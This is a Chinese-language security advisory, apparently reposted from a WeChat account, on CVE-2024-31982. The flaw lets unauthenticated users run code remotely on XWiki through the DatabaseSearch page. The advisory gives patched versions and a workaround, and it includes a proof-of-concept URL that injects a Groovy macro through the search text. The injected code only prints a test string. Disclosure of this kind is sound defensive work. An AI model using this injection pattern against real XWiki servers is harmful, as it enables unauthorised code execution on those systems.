影响
XWiki 的数据库搜索允许通过搜索文本执行远程代码。由于数据库搜索默认可供所有用户访问,因此任何公共 wiki 访问者或封闭 wiki 用户都可以执行远程代码。这会影响整个 XWiki 装置的机密性、完整性和可用性。
要在未登录的情况下重现实例,请转到
<hostname>/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20
如果 RSS 频道的标题包含Hello from search text:42,则该实例存在漏洞。
补丁
该漏洞已在XWiki 14.10.20、15.5.4和15.10RC1中修补。
解决方法
可以手动将此补丁应用于页面Main.DatabaseSearch。或者,除非用户明确使用数据库搜索,否则可以删除此页面,因为这不是XWiki的默认搜索界面。
-
https://jira.xwiki.org/browse/XWIKI-21472
-
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2858-8cfx-69m9
原文始发于微信公众号(Ots安全):CVE-2024-31982:XWiki 通过 DatabaseSearch 以访客身份远程执行代码
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论